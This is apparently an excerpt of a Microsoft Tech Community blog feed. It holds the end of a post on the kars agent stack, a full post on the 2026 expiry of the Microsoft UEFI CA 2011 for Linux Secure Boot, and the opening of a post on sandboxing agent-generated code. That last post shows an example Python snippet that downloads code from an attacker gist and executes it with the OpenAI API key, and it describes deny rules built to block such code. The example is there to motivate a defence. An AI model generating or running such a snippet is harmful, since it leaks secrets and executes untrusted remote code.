&lt;UL style="padding-left: 1.4rem; line-height: 1.7;"&gt;
&lt;LI&gt;Credentials stay out of the agent process.&lt;/LI&gt;
&lt;LI&gt;The inference router stays in the pod.&lt;/LI&gt;
&lt;LI&gt;Inter-agent encryption remains end-to-end (the broker never enters the trust set).&lt;/LI&gt;
&lt;LI&gt;AGT primitives are consumed, not duplicated.&lt;/LI&gt;
&lt;LI&gt;No mocks, stubs, or TODO placeholders in production code.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P style="margin: 1rem 0; line-height: 1.7;"&gt;Everything else is open.&lt;/P&gt;
&lt;P class="lede" style="font-size: 1.2rem; line-height: 1.65; color: #1a1a1a; border-left: 4px solid #107C10; padding: 0.4rem 0 0.4rem 1.2rem; margin: 2.75rem 0 1.75rem;"&gt;If you're evaluating how to take agentic AI from pilot to production on Kubernetes, I'd value the conversation.&amp;nbsp;&lt;STRONG&gt;More than that: we want to build a genuinely open community around securing AI agents - the hard problems here are bigger than any one team, and they're best solved in the open, together.&lt;/STRONG&gt;&amp;nbsp;Open an issue or discussion on the repository. The next 18 months of agentic AI will be decided less by model quality and more by production governance. I think the answer should be open source, K8s-native, and aligned with the upstream landscape. That's what&amp;nbsp;&lt;EM&gt;kars&lt;/EM&gt; is.&lt;/P&gt;
&lt;DIV class="footer" style="margin-top: 3rem; color: #555; font-size: 0.9rem; border-top: 1px solid #ececec; padding-top: 1.5rem; line-height: 1.7;"&gt;
&lt;P style="margin: 1rem 0;"&gt;Repository &lt;A style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://github.com/Azure/kars" target="_blank" rel="noopener"&gt;github.com/Azure/kars&lt;/A&gt; · MIT license · Tested on AKS and kind and Docker.&lt;/P&gt;
&lt;P style="margin: 1rem 0;"&gt;Cited works:&amp;nbsp;&lt;A style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://opensource.microsoft.com/blog/2026/05/18/from-open-source-to-agentic-systems-microsoft-at-open-source-summit-north-america-2026/" target="_blank" rel="noopener"&gt;Brendan Burns — From open source to agentic systems&lt;/A&gt; · &lt;A style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://microsoft.github.io/agent-governance-toolkit/" target="_blank" rel="noopener"&gt;Agent Governance Toolkit&lt;/A&gt; · &lt;A style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://learn.microsoft.com/en-us/azure/aks/use-pod-sandboxing" target="_blank" rel="noopener"&gt;AKS Pod Sandboxing&lt;/A&gt; · &lt;A style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://techcommunity.microsoft.com/blog/linuxandopensourceblog/introducing-azure-container-linux-acl/4523411" target="_blank" rel="noopener"&gt;Azure Container Linux&lt;/A&gt; · &lt;A style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://techcommunity.microsoft.com/blog/linuxandopensourceblog/announcing-azure-linux-4-0-purpose-built-for-azure-now-in-public-preview/4524267" target="_blank" rel="noopener"&gt;Azure Linux 4.0&lt;/A&gt; · &lt;A style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://aaif.io/" target="_blank" rel="noopener"&gt;Agentic AI Foundation&lt;/A&gt;&lt;/P&gt;
&lt;/DIV&gt;
&lt;/ARTICLE&gt;</description>
      <pubDate>Wed, 01 Jul 2026 15:35:28 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/introducing-kars-an-agent-reference-stack-for-kubernetes/ba-p/4529800</guid>
      <dc:creator>pallakatos</dc:creator>
      <dc:date>2026-07-01T15:35:28Z</dc:date>
    </item>
    <item>
      <title>What IT teams need to know about Linux Secure Boot certificates expiring in 2026</title>
      <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/what-it-teams-need-to-know-about-linux-secure-boot-certificates/ba-p/4530725</link>
      <description>&lt;P&gt;If your organization does not use UEFI Secure Boot on Linux systems, this transition does not affect your boot path. You can stop reading now.&lt;/P&gt;
&lt;P&gt;If you do use Secure Boot, here is what you need to know. The Microsoft Corporation UEFI CA (Certificate Authority) 2011 expires on June 27, 2026 (June 26 local time in some time zones). Expiration alone does not stop anything from booting and does not render a system insecure. Existing 2011-signed shims keep working on systems that still trust the 2011 CA. The real risk is narrower: once an operating system vendor ships a shim signed only by the Microsoft UEFI CA 2023, any system whose firmware does not already trust the 2023 CA will fail to boot. The work for you is to confirm, before that update reaches your systems, that your systems trust the 2023 CA.&lt;/P&gt;
&lt;P&gt;If you want the history of why a Microsoft certificate sits in the Linux Secure Boot path at all, skip to the end.&lt;/P&gt;
&lt;H2 id="terms-used-in-this-post"&gt;Terms used in this post&lt;/H2&gt;
&lt;P&gt;You may see three Microsoft Secure Boot certificate authorities discussed in 2026 guidance. This post focuses on the Microsoft UEFI CA 2011, which is the CA used for third-party UEFI boot applications such as the Linux shim. The other expiring Microsoft Secure Boot certificates are the Microsoft Corporation KEK CA 2011, which is used to authorize updates to Secure Boot databases, and the Microsoft Windows Production PCA 2011, which is used for Windows boot components. Windows systems have a separate &lt;A class="lia-external-url" href="https://support.microsoft.com/en-us/topic/updates-and-announcements-313b5279-2a3b-438a-83a5-3d5e2c5fc4a3" target="_blank"&gt;update path&lt;/A&gt; for those certificates; this post covers only the Linux boot chain.&lt;/P&gt;
&lt;P&gt;The 2023 update also separates two uses that were both covered by the Microsoft UEFI CA 2011. The Microsoft UEFI CA 2023 is for third-party UEFI boot applications, including the Linux shim. The Microsoft Option ROM UEFI CA 2023 is for third-party option ROMs, such as firmware on some add-in cards. This post is about the Linux bootloader path, but physical systems that rely on signed option ROMs may need to check that path too.&lt;/P&gt;
&lt;P&gt;Microsoft began returning 2023-signed Linux shim binaries to operating system vendors in October 2025, and since then a submitted shim comes back signed by both the 2011 CA and the 2023 CA. Once the 2011 CA expires, Microsoft can only sign with the 2023 CA.&lt;/P&gt;
&lt;P&gt;In UEFI Secure Boot terminology, &lt;CODE&gt;db&lt;/CODE&gt; is the allowed signature database, &lt;CODE&gt;dbx&lt;/CODE&gt; is the forbidden or revoked signature database, and &lt;CODE&gt;KEK&lt;/CODE&gt; contains keys that can authorize updates to &lt;CODE&gt;db&lt;/CODE&gt; and &lt;CODE&gt;dbx&lt;/CODE&gt;. &lt;CODE&gt;SBAT&lt;/CODE&gt; is a shim ecosystem mechanism for revoking boot components by generation. SBAT is related to Secure Boot revocation, but it is separate from the CA expiration itself.&lt;/P&gt;
&lt;P&gt;For brevity, the rest of this post uses operating system vendor to include Linux distributions and other vendors that ship and support Linux boot components. Microsoft returns signed shims to that submitting operating system vendor. It does not push shim updates to end users or IT departments. Those reach systems through the normal operating system, package, image, or platform update channels.&lt;/P&gt;
&lt;H2 id="what-is-not-happening"&gt;What is not happening&lt;/H2&gt;
&lt;P&gt;Expiration is not revocation, and it does not cause an immediate boot failure.&lt;/P&gt;
&lt;P&gt;The 2011 CA expiring does not make existing 2011-signed shims stop booting on June 27, 2026. UEFI Secure Boot validates a signature against the trust database and revocation state, not against the certificate's validity period. The image-validation process in the &lt;A href="https://uefi.org/specs/UEFI/2.11/32_Secure_Boot_and_Driver_Signing.html#authorization-process" target="_blank" rel="noopener"&gt;UEFI specification&lt;/A&gt; bases the decision on whether the image's hash or signing certificate is present in the authorized database (&lt;CODE&gt;db&lt;/CODE&gt;) and absent from the forbidden database (&lt;CODE&gt;dbx&lt;/CODE&gt;). It does not check whether the certificate has expired. Firmware bugs are always possible, but expiration by itself should not invalidate an already-signed shim.&lt;/P&gt;
&lt;P&gt;There is also no current plan to revoke the Microsoft UEFI CA 2011. Expiration means Microsoft can no longer sign new binaries with that certificate. Revocation would mean telling systems not to trust binaries signed with it. Revocation is not the plan.&lt;/P&gt;
&lt;P&gt;For the same reason, do not remove the 2011 CA from a system's Secure Boot &lt;CODE&gt;db&lt;/CODE&gt;. Removing it strips that trust path. Removal is not required for this transition, and existing boot components may still depend on the 2011 CA.&lt;/P&gt;
&lt;P&gt;No operating system vendor has to move to a 2023-signed shim on the expiration date. An operating system vendor may keep shipping a 2011-signed shim (if one is available), ship a 2023-only shim, or ship one carrying both signatures. That decision belongs to the operating system vendor.&lt;/P&gt;
&lt;H2 id="what-can-break"&gt;What can break&lt;/H2&gt;
&lt;P&gt;The failure case is a mismatch between the shim signature and the firmware trust database. The moment to worry about is not the expiration date. It is when a system first receives a 2023-only shim.&lt;/P&gt;
&lt;P&gt;That leaves a remediation window: the time between the expiration date and the first 2023-only shim reaching a given system. How long it lasts depends on your operating system vendor's packaging decisions, any security fix that forces a new shim release, and how easily you can update firmware or VM Secure Boot state on the affected platforms.&lt;/P&gt;
&lt;P&gt;The transition comes down to one table:&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Firmware trust database&lt;/th&gt;&lt;th&gt;2011-only shim&lt;/th&gt;&lt;th&gt;2023-only shim&lt;/th&gt;&lt;th&gt;Dual-signed shim&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;2011 CA only&lt;/td&gt;&lt;td&gt;Boots, but depends on continued 2011 trust&lt;/td&gt;&lt;td&gt;Does not boot&lt;/td&gt;&lt;td&gt;Should boot&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;2023 CA only&lt;/td&gt;&lt;td&gt;Does not boot&lt;/td&gt;&lt;td&gt;Boots&lt;/td&gt;&lt;td&gt;Should boot&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Both 2011 and 2023 CAs&lt;/td&gt;&lt;td&gt;Boots&lt;/td&gt;&lt;td&gt;Boots&lt;/td&gt;&lt;td&gt;Boots&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;The table is deliberately simple. Real systems also have&amp;nbsp;&lt;CODE&gt;dbx&lt;/CODE&gt; revocations, SBAT policy, firmware bugs, operating system vendor packaging choices, and platform-specific update paths. But this is the core compatibility problem.&lt;/P&gt;
&lt;P&gt;Dual-signed shims help bridge the transition, because the same shim can validate through either CA. However, they are not a guarantee. Some firmware mishandles multiple signatures and evaluates only one of them, revocation and vendor support still apply, and the operating system vendor decides whether to ship and support a dual-signed shim at all.&lt;/P&gt;
&lt;P&gt;This kind of failure happens early, before the operating system loads. Recovery means restoring a trusted boot path or following your operating system, hardware, or platform vendor's recovery guidance. It is not a package rollback inside a running system.&lt;/P&gt;
&lt;H2 id="who-should-pay-closest-attention"&gt;Who should pay closest attention&lt;/H2&gt;
&lt;P&gt;This transition matters most where the operating system, firmware, and update path may not move together. If you run a maintained operating system on maintained hardware or a maintained virtualization platform, the normal vendor update path may handle most of it. Closer attention is worthwhile where that path is missing, delayed, customized, or hard to validate.&lt;/P&gt;
&lt;P&gt;Older hardware is the first case. Some systems need a firmware update before they can trust the 2023 CA, and support can vary by model even within one hardware vendor's portfolio. Check each model you operate rather than assuming one answer covers the fleet.&lt;/P&gt;
&lt;P&gt;Long-lived virtual machines are the second. VM firmware is still firmware. A VM's Secure Boot state depends on when it was created, which platform firmware it uses, and which UEFI variables have changed since. Firmware is not just another package update, so a long-lived VM may never have received the relevant firmware or database updates unless the administrator or platform applied them. Your cloud or virtualization provider should be able to say how the 2023 CA is handled for new VMs, existing VMs, and imported or custom images. For Azure Trusted Launch and Confidential VMs specifically, Microsoft has published &lt;A class="lia-external-url" href="https://support.microsoft.com/en-us/topic/secure-boot-certificate-updates-for-linux-on-azure-virtual-machines-df51ba85-4e1e-4eda-b1d8-f0881970e997" target="_blank"&gt;guidance on identifying and updating affected instances&lt;/A&gt;.&lt;/P&gt;
&lt;P&gt;Older operating system releases need more careful validation. Some lack current Secure Boot tooling, current &lt;A href="https://fwupd.org" target="_blank" rel="noopener"&gt;&lt;CODE&gt;fwupd&lt;/CODE&gt;&lt;/A&gt; daemon behavior, or a supported path for updating UEFI trust databases. A command that works on one release may not be supported on another.&lt;/P&gt;
&lt;P&gt;Custom fleets are their own category: systems built from custom images, frozen package mirrors, pinned bootloader versions, or local Secure Boot policy changes. The more an environment differs from the vendor's default update path, the more you need to verify the actual firmware trust database and installed shim directly.&lt;/P&gt;
&lt;P&gt;Smaller operating system vendors and long-tail distributions are worth checking too, especially if they submit shim updates infrequently or have not finished their 2023 signing transition. No single authoritative public list tells you which releases have completed this work.&lt;/P&gt;
&lt;H2 id="who-is-responsible-for-what"&gt;Who is responsible for what&lt;/H2&gt;
&lt;P&gt;There is no single Linux Secure Boot owner who can make every system safe for the transition.&lt;/P&gt;
&lt;P&gt;The operating system vendor controls which shim and boot components it ships. It also controls whether its update process checks the firmware trust database before installing a 2023-only shim.&lt;/P&gt;
&lt;P&gt;The Linux community runs a community-driven &lt;A href="https://github.com/rhboot/shim-review" target="_blank" rel="noopener"&gt;shim-review process&lt;/A&gt; for shim submissions. That process is the primary review gate before an operating system vendor requests a Microsoft signature. It is not a support channel for individual systems or fleets.&lt;/P&gt;
&lt;P&gt;The hardware vendor, firmware vendor, or virtual machine platform controls which trust anchors are present by default and how firmware updates are delivered. In a physical machine, that may mean a BIOS or firmware update. In a VM, it may mean platform firmware defaults, guest-visible UEFI variables, or a provider-specific remediation process.&lt;/P&gt;
&lt;P&gt;Microsoft controls the Microsoft UEFI signing service and the Microsoft UEFI CAs. After shim-review approval, Microsoft verifies the submitter's relationship to the operating system vendor, runs some additional checks, signs submitted shims, and returns the signed artifacts to the submitting operating system vendor. Microsoft does not choose when each operating system vendor ships a new shim to its customers.&lt;/P&gt;
&lt;P&gt;Your organization controls the systems it administers. In practice, that means checking whether Secure Boot is enabled, checking which certificates are trusted, following guidance from the relevant operating system vendor, and following guidance from the hardware vendor or VM provider.&lt;/P&gt;
&lt;P&gt;This is why the right answer for any specific system depends on its operating system vendor, hardware vendor, and platform. This post explains the model. Only those vendors can tell you what is supported for your systems.&lt;/P&gt;
&lt;H2 id="what-to-check"&gt;What to check&lt;/H2&gt;
&lt;P&gt;The exact commands vary by operating system vendor, package set, and platform. Treat the examples below as illustrations, not guaranteed instructions for every Linux system. IT departments should validate commands against vendor documentation before using them in production automation.&lt;/P&gt;
&lt;P&gt;At fleet scale, the useful starting point is an inventory rather than a one-time manual check. Useful fields include whether Secure Boot is enabled, which Microsoft UEFI CAs are present in the firmware trust database, which CA signed the installed shim, the operating system release, the hardware model or VM platform, the update channel, and whether the system comes from a custom image or vendor image.&lt;/P&gt;
&lt;P&gt;Set up representative canary systems before any broad rollout. A canary set should cover the differences that matter in your fleet: hardware model, VM platform, operating system release, image lineage, and update channel. The aim is to avoid discovering a firmware or shim mismatch for the first time during a broad production update, not to build a new certification program.&lt;/P&gt;
&lt;P&gt;First, check whether Secure Boot is enabled:&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;DIV id="cb1" class="sourceCode"&gt;
&lt;PRE class="sourceCode bash"&gt;&lt;CODE class="sourceCode bash"&gt;&lt;SPAN id="cb1-1"&gt;&lt;SPAN class="fu"&gt;sudo&lt;/SPAN&gt; mokutil &lt;SPAN class="at"&gt;--sb-state&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/CODE&gt;&lt;/PRE&gt;
&lt;/DIV&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;If Secure Boot is disabled, this certificate transition does not affect that system's current boot path.&lt;/P&gt;
&lt;P&gt;Next, check which Microsoft UEFI CAs are in the firmware trust database:&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;DIV id="cb2" class="sourceCode"&gt;
&lt;PRE class="sourceCode bash"&gt;&lt;CODE class="sourceCode bash"&gt;&lt;SPAN id="cb2-1"&gt;&lt;SPAN class="fu"&gt;sudo&lt;/SPAN&gt; mokutil &lt;SPAN class="at"&gt;--db&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/CODE&gt;&lt;/PRE&gt;
&lt;/DIV&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Look for entries such as:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;CODE&gt;Microsoft Corporation UEFI CA 2011&lt;/CODE&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;CODE&gt;Microsoft UEFI CA 2023&lt;/CODE&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;If both are present, the system is prepared for a future 2023-signed shim. If only the 2011 CA is present, check guidance from the relevant operating system vendor and platform provider before accepting a 2023-only shim update.&lt;/P&gt;
&lt;P&gt;On physical systems, also check whether the platform relies on signed third-party option ROMs. Those may require the Microsoft Option ROM UEFI CA 2023 in addition to the Microsoft UEFI CA 2023 used for boot applications. This is another reason hardware guidance can vary by model.&lt;/P&gt;
&lt;P&gt;Administrators can also inspect the signature on the shim currently installed on a system. On Enterprise Linux and related distributions, &lt;CODE&gt;pesign&lt;/CODE&gt; is often used:&lt;/P&gt;
&lt;DIV id="cb3" class="sourceCode"&gt;
&lt;PRE class="sourceCode bash"&gt;&lt;CODE class="sourceCode bash"&gt;&lt;SPAN id="cb3-1"&gt;&lt;SPAN class="fu"&gt;&lt;BR /&gt;sudo&lt;/SPAN&gt; dnf install pesign&lt;/SPAN&gt;
&lt;SPAN id="cb3-2"&gt;&lt;SPAN class="fu"&gt;sudo&lt;/SPAN&gt; pesign &lt;SPAN class="at"&gt;-S&lt;/SPAN&gt; &lt;SPAN class="at"&gt;-i&lt;/SPAN&gt; /boot/efi/EFI/&lt;SPAN class="op"&gt;&amp;lt;&lt;/SPAN&gt;vendor-or-distribution&lt;SPAN class="op"&gt;&amp;gt;&lt;/SPAN&gt;/shimx64.efi&lt;/SPAN&gt;&lt;/CODE&gt;&lt;/PRE&gt;
&lt;/DIV&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;On Debian, Ubuntu, and related distributions,&amp;nbsp;&lt;CODE&gt;sbverify&lt;/CODE&gt; from &lt;CODE&gt;sbsigntools&lt;/CODE&gt; is often used:&lt;/P&gt;
&lt;DIV id="cb4" class="sourceCode"&gt;
&lt;PRE class="sourceCode bash"&gt;&lt;CODE class="sourceCode bash"&gt;&lt;SPAN id="cb4-1"&gt;&lt;SPAN class="fu"&gt;&lt;BR /&gt;sudo&lt;/SPAN&gt; apt install sbsigntools&lt;/SPAN&gt;
&lt;SPAN id="cb4-2"&gt;&lt;SPAN class="fu"&gt;sudo&lt;/SPAN&gt; sbverify &lt;SPAN class="at"&gt;--list&lt;/SPAN&gt; /boot/efi/EFI/&lt;SPAN class="op"&gt;&amp;lt;&lt;/SPAN&gt;vendor-or-distribution&lt;SPAN class="op"&gt;&amp;gt;&lt;/SPAN&gt;/shimx64.efi&lt;/SPAN&gt;&lt;/CODE&gt;&lt;/PRE&gt;
&lt;/DIV&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;The path to shim may differ. Some systems use a different EFI path, a different architecture suffix, or a different bootloader arrangement. Vendor documentation is the right source for exact commands.&lt;/P&gt;
&lt;H2 id="how-updates-may-be-delivered"&gt;How updates may be delivered&lt;/H2&gt;
&lt;P&gt;Many operating system vendors use the &lt;A href="https://lvfs.org" target="_blank" rel="noopener"&gt;Linux Vendor Firmware Service&lt;/A&gt; (LVFS) and &lt;CODE&gt;fwupd&lt;/CODE&gt; for firmware-related updates, including some UEFI Secure Boot database updates. Not every vendor enables the same tooling, and not every platform supports the same update mechanism.&lt;/P&gt;
&lt;P&gt;Common examples include:&lt;/P&gt;
&lt;DIV id="cb5" class="sourceCode"&gt;
&lt;PRE class="sourceCode bash"&gt;&lt;CODE class="sourceCode bash"&gt;&lt;SPAN id="cb5-1"&gt;&lt;SPAN class="fu"&gt;&lt;BR /&gt;sudo&lt;/SPAN&gt; fwupdmgr update&lt;/SPAN&gt;
&lt;SPAN id="cb5-2"&gt;&lt;SPAN class="fu"&gt;sudo&lt;/SPAN&gt; fwupdmgr security&lt;/SPAN&gt;
&lt;SPAN id="cb5-3"&gt;&lt;SPAN class="fu"&gt;sudo&lt;/SPAN&gt; fwupdmgr get-devices&lt;/SPAN&gt;&lt;/CODE&gt;&lt;/PRE&gt;
&lt;/DIV&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Some systems may require a firmware update from the hardware vendor. Some may support a standalone UEFI database update. Some may not support a safe standalone update at all. Some hardware and firmware vendors block standalone database updates because earlier failures showed that the update could break systems.&lt;/P&gt;
&lt;P&gt;Updating the Secure Boot allowed signature database (&lt;CODE&gt;db&lt;/CODE&gt;) also depends on authorization from keys in &lt;CODE&gt;KEK&lt;/CODE&gt;. That is one reason these updates often require cooperation from the firmware, hardware, or VM platform vendor. Administrators should not assume that possession of a certificate file is enough to update a system safely.&lt;/P&gt;
&lt;P&gt;Do not force a Secure Boot database update just because a command exists. Follow the guidance for the specific hardware, VM platform, or operating system vendor. Forcing an update can force a physical reboot of a machine or destroy the system.&lt;/P&gt;
&lt;P&gt;After the first inventory pass, keep watching the operating system vendor's security advisories and bootloader package updates.&lt;/P&gt;
&lt;H2 id="questions-for-your-vendors"&gt;Questions for your vendors&lt;/H2&gt;
&lt;P&gt;The right questions depend on the system, but these are the kinds of answers IT departments should look for from operating system vendors, hardware vendors, and VM providers:&lt;/P&gt;
&lt;OL type="1"&gt;
&lt;LI&gt;Does this operating system release currently ship a 2011-signed, 2023-signed, or dual-signed shim?&lt;/LI&gt;
&lt;LI&gt;If the vendor plans to ship a 2023-only shim, will the update process check whether the system trusts the 2023 CA before installing it?&lt;/LI&gt;
&lt;LI&gt;How is the Microsoft UEFI CA 2023 delivered for this hardware model, VM platform, or image?&lt;/LI&gt;
&lt;LI&gt;Is a standalone Secure Boot database update supported, or must the update arrive through a firmware update?&lt;/LI&gt;
&lt;LI&gt;Does support vary by hardware model, firmware version, VM generation, image type, or operating system release?&lt;/LI&gt;
&lt;LI&gt;What should administrators monitor for shim, GRUB, SBAT, &lt;CODE&gt;db&lt;/CODE&gt;, &lt;CODE&gt;KEK&lt;/CODE&gt;, or &lt;CODE&gt;dbx&lt;/CODE&gt; updates related to this transition?&lt;/LI&gt;
&lt;LI&gt;What is the recommended validation path before broad deployment?&lt;/LI&gt;
&lt;LI&gt;What is the supported recovery path if a system receives an incompatible shim or firmware update and fails to boot?&lt;/LI&gt;
&lt;/OL&gt;
&lt;H2 id="what-to-do-now"&gt;What to do now&lt;/H2&gt;
&lt;P&gt;If an IT department administers Linux systems that use Secure Boot, the useful work is straightforward:&lt;/P&gt;
&lt;OL type="1"&gt;
&lt;LI&gt;Use the checks above to inventory Secure Boot state, trusted CAs, and installed shim signatures across representative systems.&lt;/LI&gt;
&lt;LI&gt;Identify the parts of the fleet most likely to diverge from default vendor paths, including older hardware, long-lived VMs, older operating system releases, custom images, and pinned bootloader packages.&lt;/LI&gt;
&lt;LI&gt;Read operating system, hardware, and VM provider guidance before accepting 2023-only shim updates or applying firmware and Secure Boot database updates.&lt;/LI&gt;
&lt;LI&gt;Test representative canary systems before rolling out shim or firmware changes broadly.&lt;/LI&gt;
&lt;LI&gt;Monitor operating system vendor advisories for shim and bootloader updates related to the transition.&lt;/LI&gt;
&lt;LI&gt;Avoid forcing low-level firmware or UEFI variable updates unless vendor guidance says to do so.&lt;/LI&gt;
&lt;/OL&gt;
&lt;H2 id="how-linux-got-here"&gt;How Linux got here&lt;/H2&gt;
&lt;P&gt;UEFI Secure Boot was introduced to let firmware verify boot components before executing them. The firmware contains a trust database. If a bootloader is signed by a trusted certificate and is not blocked by revocation policy, the firmware can execute it.&lt;/P&gt;
&lt;P&gt;In the PC ecosystem, Microsoft has long operated the signing infrastructure used by Windows and by many third-party UEFI boot components. Linux operating system vendors do not have Microsoft sign the Linux kernel directly. Instead, they use a small first-stage bootloader called shim.&lt;/P&gt;
&lt;P&gt;The Linux shim is signed by Microsoft so firmware will start it. The shim then validates the next boot component, usually GRUB or another vendor-controlled bootloader, using keys controlled by the operating system vendor, not Microsoft. That structure lets Linux operating system vendors participate in the UEFI Secure Boot ecosystem while keeping control over their own boot chains.&lt;/P&gt;
&lt;P&gt;The &lt;A href="https://github.com/rhboot/shim" target="_blank" rel="noopener"&gt;shim code is developed publicly&lt;/A&gt;, and shim signing uses the community-run shim-review process before the Microsoft signing step. That split is important. The Linux community reviews shim submissions, and Microsoft operates the signing service that applies a signature firmware will trust.&lt;/P&gt;
&lt;P&gt;The certificate rotation affects this first handoff. Firmware must trust the CA that signed shim. If a future shim is signed only by the 2023 CA, the firmware needs the 2023 CA in its trust database.&lt;/P&gt;
&lt;P&gt;A system that keeps booting with a 2011-signed shim is not automatically broken or insecure on the expiration date. A system that moves to a 2023-signed shim needs to trust the 2023 CA; plan for that transition.&lt;/P&gt;</description>
      <pubDate>Fri, 26 Jun 2026 00:35:08 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/what-it-teams-need-to-know-about-linux-secure-boot-certificates/ba-p/4530725</guid>
      <dc:creator>bexelbie</dc:creator>
      <dc:date>2026-06-26T00:35:08Z</dc:date>
    </item>
    <item>
      <title>Govern AI Agents Using Agent Governance Toolkit and Azure Container App Sandboxes</title>
      <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/govern-ai-agents-using-agent-governance-toolkit-and-azure/ba-p/4526011</link>
      <description>&lt;P&gt;When you let a model generate code and you actually execute it, you are handing the model a Python REPL on whatever machine runs the agent. That sounds alarmist — right up until a planner (yours, mine, or anyone else's) produces a snippet that reads as harmless on the first pass:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;# "summarize the changelog" import urllib.request, os data = urllib.request.urlopen( "https://gist.githubusercontent.com/attacker/.../raw" ).read() exec(data, {"OPENAI_API_KEY": os.environ["OPENAI_API_KEY"]})&lt;/LI-CODE&gt;
&lt;P data-line="20"&gt;Two lines of mostly-stdlib Python. If it runs in your application process, the model just decided it could pull arbitrary code off the internet and pass your secrets into it. Today that's a hypothetical; tomorrow it's a postmortem.&lt;/P&gt;
&lt;P data-line="25"&gt;The defense splits into two questions developers can actually answer:&lt;/P&gt;
&lt;OL data-line="27"&gt;
&lt;LI data-line="27"&gt;&lt;STRONG&gt;Where does the code run?&lt;/STRONG&gt;&amp;nbsp;Not in your process. A&amp;nbsp;&lt;EM&gt;sandbox&lt;/EM&gt;&amp;nbsp;— a separate, disposable execution environment with its own CPU, memory, filesystem and network — gives you a hard boundary so a bad snippet can crash itself, not your service. Sandboxes have shipped in many flavors (containers, micro-VMs, wasm); the new one in this post is&amp;nbsp;&lt;STRONG&gt;Azure Container Apps sandbox&lt;/STRONG&gt;, where each agent session gets a managed, per-session container with a fail-closed egress proxy in front, scaled and operated by Azure.&lt;/LI&gt;
&lt;LI data-line="35"&gt;&lt;STRONG&gt;What is the code allowed to do?&lt;/STRONG&gt;&amp;nbsp;A sandbox alone is a wide playing field — an attacker who wins a sandbox still has the whole sandbox.&amp;nbsp;&lt;EM&gt;Policy&lt;/EM&gt;&amp;nbsp;narrows the field. A single YAML&amp;nbsp;PolicyDocument&amp;nbsp;says: these tools, these hosts, these CPU / memory / time budgets, no&amp;nbsp;subprocess, no&amp;nbsp;pip install, no substring match on&amp;nbsp;OPENAI_API_KEY. The first cut is enforced&amp;nbsp;&lt;STRONG&gt;on the host by AGT policy&lt;/STRONG&gt;&amp;nbsp;(deny rules, tool allowlist, AST scan) so denied snippets never even leave your process; the network cut is enforced&amp;nbsp;&lt;STRONG&gt;inside the ACA sandbox by the egress allowlist&lt;/STRONG&gt;&amp;nbsp;so an outbound call to a non-allowed host fails closed at the proxy. Same document, two layers, no drift.&lt;/LI&gt;
&lt;/OL&gt;
&lt;P data-line="47"&gt;&lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit" target="_blank" rel="noopener"&gt;AGT &lt;/A&gt;ships a Python package — agt-sandbox — that answers both, and a recently added sandbox provider that was recently announced in Build 2026 - Azure container app sandboxes. The rest of this post walks through what's in the agt-sandbox package, the abstraction it pivots on, the new ACA provider, how it composes with AGT policy, and a full LLM-planned research agent built on top.&lt;/P&gt;
&lt;H2 data-line="56"&gt;1. What is Azure Container Apps sandbox?&lt;/H2&gt;
&lt;P data-line="58"&gt;&lt;A href="https://techcommunity.microsoft.com/blog/appsonazureblog/introducing-azure-container-apps-sandboxes-secure-infrastructure-for-agentic-wor/4524131" target="_blank" rel="noopener" data-href="https://techcommunity.microsoft.com/blog/appsonazureblog/introducing-azure-container-apps-sandboxes-secure-infrastructure-for-agentic-wor/4524131"&gt;Azure Container Apps Sandboxes&lt;/A&gt;&amp;nbsp;(public preview, June 2, 2026) are a first-class Azure resource —&amp;nbsp;Microsoft.App/SandboxGroups&amp;nbsp;— purpose-built for running untrusted, agent-generated code. Each sandbox runs in its own&amp;nbsp;&lt;STRONG&gt;hardware-isolated microVM&lt;/STRONG&gt;, boots in sub-second time from an OCI disk image, and can suspend/resume from full memory + disk snapshots for scale-to-zero economics on stateful compute. It's the same primitive that powers Cloud sandboxes in GitHub Copilot, Foundry Hosted Agents, and ACA Express.&lt;/P&gt;
